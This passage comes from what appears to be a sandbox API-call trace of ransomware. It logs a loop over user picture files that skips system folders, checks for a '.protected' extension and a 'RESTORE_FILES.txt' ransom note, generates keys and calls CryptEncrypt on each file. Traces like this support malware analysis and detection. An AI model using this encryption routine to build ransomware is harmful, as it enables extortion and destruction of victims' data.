Pictures\\usertile19.bmp") returned 86 [0093.247] StrStrIW (lpFirst="usertile19.bmp", lpSrch=".protected") returned 0x0 [0093.247] lstrcmpW (lpString1="usertile19.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.247] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.247] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.247] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Windows") returned -1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Program Files") returned 1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="Program Files (x86)") returned 1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="$Recycle.bin") returned 1 [0093.247] lstrcmpiW (lpString1="usertile20.bmp", lpString2="System Volume Information") returned 1 [0093.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned 86 [0093.248] StrStrIW (lpFirst="usertile20.bmp", lpSrch=".protected") returned 0x0 [0093.248] lstrcmpW (lpString1="usertile20.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 
[0093.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile20.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.248] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Windows") returned -1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Program Files") returned 1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="Program Files (x86)") returned 1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="$Recycle.bin") returned 1 [0093.248] lstrcmpiW (lpString1="usertile21.bmp", lpString2="System Volume Information") returned 1 [0093.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned 86 [0093.248] StrStrIW (lpFirst="usertile21.bmp", lpSrch=".protected") returned 0x0 [0093.248] lstrcmpW (lpString1="usertile21.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp" 
(normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile21.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.248] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Windows") returned -1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Program Files") returned 1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="Program Files (x86)") returned 1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="$Recycle.bin") returned 1 [0093.248] lstrcmpiW (lpString1="usertile22.bmp", lpString2="System Volume Information") returned 1 [0093.248] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp") returned 86 [0093.248] StrStrIW (lpFirst="usertile22.bmp", lpSrch=".protected") returned 0x0 [0093.248] lstrcmpW (lpString1="usertile22.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile22.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile22.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.249] FindNextFileW (in: hFindFile=0x47ba10, 
lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Windows") returned -1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Program Files") returned 1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Program Files (x86)") returned 1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="$Recycle.bin") returned 1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="System Volume Information") returned 1 [0093.249] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned 86 [0093.249] StrStrIW (lpFirst="usertile23.bmp", lpSrch=".protected") returned 0x0 [0093.249] lstrcmpW (lpString1="usertile23.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.249] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.249] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.249] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Windows") returned -1 [0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Program Files") returned 1 [0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Program Files (x86)") returned 1 
[0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="$Recycle.bin") returned 1 [0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="System Volume Information") returned 1 [0093.249] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned 86 [0093.249] StrStrIW (lpFirst="usertile24.bmp", lpSrch=".protected") returned 0x0 [0093.249] lstrcmpW (lpString1="usertile24.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.249] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.249] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.249] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.249] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Windows") returned -1 [0093.249] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Program Files") returned 1 [0093.249] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Program Files (x86)") returned 1 [0093.250] lstrcmpiW (lpString1="usertile25.bmp", lpString2="$Recycle.bin") returned 1 [0093.250] lstrcmpiW (lpString1="usertile25.bmp", lpString2="System Volume Information") returned 1 [0093.250] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile25.bmp") returned 86 [0093.250] StrStrIW (lpFirst="usertile25.bmp", lpSrch=".protected") returned 0x0 [0093.250] lstrcmpW (lpString1="usertile25.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.250] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Windows") returned -1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Program Files") returned 1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Program Files (x86)") returned 1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="$Recycle.bin") returned 1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="System Volume Information") returned 1 [0093.250] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned 86 [0093.250] StrStrIW (lpFirst="usertile26.bmp", lpSrch=".protected") returned 0x0 [0093.250] lstrcmpW (lpString1="usertile26.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) 
returned 1 [0093.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.250] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Windows") returned -1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Program Files") returned 1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Program Files (x86)") returned 1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="$Recycle.bin") returned 1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="System Volume Information") returned 1 [0093.250] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned 86 [0093.250] StrStrIW (lpFirst="usertile27.bmp", lpSrch=".protected") returned 0x0 [0093.250] lstrcmpW (lpString1="usertile27.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 
Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.251] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Windows") returned -1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Program Files") returned 1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Program Files (x86)") returned 1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="$Recycle.bin") returned 1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="System Volume Information") returned 1 [0093.251] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned 86 [0093.251] StrStrIW (lpFirst="usertile28.bmp", lpSrch=".protected") returned 0x0 [0093.251] lstrcmpW (lpString1="usertile28.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.251] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.251] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.251] FindNextFileW (in: 
hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Windows") returned -1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Program Files") returned 1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Program Files (x86)") returned 1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="$Recycle.bin") returned 1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="System Volume Information") returned 1 [0093.251] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned 86 [0093.251] StrStrIW (lpFirst="usertile29.bmp", lpSrch=".protected") returned 0x0 [0093.251] lstrcmpW (lpString1="usertile29.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.251] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.251] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.251] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.251] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Windows") returned -1 [0093.251] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Program Files") returned 1 [0093.252] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Program Files 
(x86)") returned 1 [0093.252] lstrcmpiW (lpString1="usertile30.bmp", lpString2="$Recycle.bin") returned 1 [0093.252] lstrcmpiW (lpString1="usertile30.bmp", lpString2="System Volume Information") returned 1 [0093.252] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned 86 [0093.252] StrStrIW (lpFirst="usertile30.bmp", lpSrch=".protected") returned 0x0 [0093.252] lstrcmpW (lpString1="usertile30.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.252] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.252] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.252] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Windows") returned -1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Program Files") returned 1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Program Files (x86)") returned 1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="$Recycle.bin") returned 1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="System Volume Information") returned 1 [0093.252] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned 86 [0093.252] StrStrIW (lpFirst="usertile31.bmp", lpSrch=".protected") returned 0x0 [0093.252] lstrcmpW (lpString1="usertile31.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.252] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.252] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.252] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Windows") returned -1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Program Files") returned 1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Program Files (x86)") returned 1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="$Recycle.bin") returned 1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="System Volume Information") returned 1 [0093.252] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned 86 [0093.252] StrStrIW (lpFirst="usertile32.bmp", lpSrch=".protected") returned 0x0 [0093.252] lstrcmpW (lpString1="usertile32.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.252] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.253] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Windows") returned -1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Program Files") returned 1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Program Files (x86)") returned 1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="$Recycle.bin") returned 1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="System Volume Information") returned 1 [0093.253] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned 86 [0093.253] StrStrIW (lpFirst="usertile33.bmp", lpSrch=".protected") returned 0x0 [0093.253] lstrcmpW (lpString1="usertile33.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.253] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.253] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Windows") returned -1 [0093.253] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Program Files") returned 1 [0093.253] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Program Files (x86)") returned 1 [0093.253] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned 86 [0093.253] StrStrIW (lpFirst="usertile34.bmp", lpSrch=".protected") returned 0x0 [0093.253] lstrcmpW (lpString1="usertile34.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.254] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.254] wnsprintfW (in: pszDest=0x4bfb20, 
